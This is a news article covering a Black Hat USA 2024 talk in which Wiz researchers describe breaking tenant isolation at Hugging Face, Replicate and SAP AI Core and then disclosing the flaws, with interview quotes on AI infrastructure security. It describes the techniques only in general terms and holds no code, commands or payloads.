This content is part of the Conference Coverage: The latest from Black Hat USA 2024

Wiz researchers hacked into leading AI infrastructure providers

During Black Hat USA 2024, Wiz researchers discussed how they were able to infiltrate leading AI service providers and access confidential data and models across the platforms.

LAS VEGAS -- Wiz researchers warned that AI infrastructure providers like Hugging Face and Replicate are susceptible to novel attacks and must improve their defenses to protect sensitive user data.

During Black Hat USA 2024 on Wednesday, Wiz security researchers Hillai Ben-Sasson and Sagi Tzadik led a session that expanded on year-long research they conducted into three of the major AI infrastructure providers: Hugging Face, Replicate and SAP AI Core. The researchers tested whether they could break into the leading AI platforms and studied how easy it would be for attackers to gain access to confidential data.

The goal of the research was to assess the security of these platforms and determine the potential risks of storing valuable data in one of the top three AI platforms. As new AI technology has taken off, cybercriminals and nation-state actors alike have targeted third-party providers and platforms that host sensitive data and training models.

Hugging Face, a machine learning platform where users create models and store data sets, experienced a recent attack. In June, the platform detected suspicious activity in its Spaces platform, which required a key and token reset.

During the session, the researchers showed how they compromised the platforms by uploading malicious models and using container escape techniques to break out of their tenant and move laterally across the service. In an April blog post, Wiz researchers described how they were able to compromise Hugging Face and gain cross-tenant access to other customers' data and training models. The cloud security vendor later published research on similar issues with Replicate and SAP AI Core, and they demonstrated the attack techniques during Wednesday's session.

Prior to Black Hat, Ben-Sasson, Tzadik and Ami Luttwak, CTO and co-founder of Wiz, spoke with TechTarget Editorial about the session and lessons learned from the research. In all three cases, the researchers were able to hack Hugging Face, Replicate and SAP to access sensitive customer data.

"We accessed millions of confidential AI artifacts like models, data sets, code -- unique intellectual property that can go for millions of dollars," Ben-Sasson said.

Luttwak said many AI service providers use containers as barriers between different customers. But he stressed that those containers can be bypassed in many ways. For example, Luttwak said container services are prone to misconfigurations.

"There are all sorts of vulnerabilities that come out that will allow people to bypass these barriers. We think that containerization is not a secure enough barrier between tenants or tenant isolation," Luttwak said.

Once the researchers discovered they could hack the platforms, they reported the issues to each service provider. Sasson applauded Hugging Face, Replicate and SAP for their disclosure responses. He said they were collaborative and professional, and Wiz researchers worked closely with their respective security teams to resolve the issues.

While the vulnerabilities and weaknesses were addressed by the providers, Wiz researchers recommended that organizations adapt their threat models accordingly to account for potential data compromises. As for the platforms, the researchers urged the AI service providers to improve their isolation and sandboxing standards to prevent threat actors from jumping to other tenants and moving laterally within the platforms.

Rapid AI adoption and risks

In addition to the three platforms needing increased defenses such as improved sandboxing and isolation standards, the researchers also discussed overall problems associated with AI's rapid adoption. They stressed that security is an afterthought when it comes to AI.

"AI security is also infrastructure security because AI is very trendy and very new, and not a lot of people understand what AI security actually is," Luttwak said.

Luttwak added that organizations testing AI models right now often aren't doing it right because security teams don't understand all the infrastructure pieces. That includes dozens or even hundreds of unfamiliar tools, which create more security problems. It's a huge challenge for security teams because everyone wants to use AI tools, he emphasized. Therefore, teams are using whatever resources they can, including open-source tools, while security becomes a secondary concern.

"These tools are not built with security and that means it puts every company at risk," Luttwak said. "It's just about making sure that when you use models [and] when you use open-source tools that are related to AI, [you] do due diligence security validation for them. If we can prove it on the AI service provider companies where it's their main business, you can imagine a company that's not even that big."

During another Black Hat session on Wednesday, Chris Wysopal, CTO and co-founder at Veracode, discussed how developers are increasingly using large language models for coding but often putting security second. He listed several concerns including data set poisoning generative AI tools replicating existing vulnerabilities.

Arielle Waldman is a Boston-based reporter covering enterprise security news.

Dig Deeper on Data security and privacy

Networking
CIO
Enterprise Desktop
Cloud Computing
ComputerWeekly.com
Close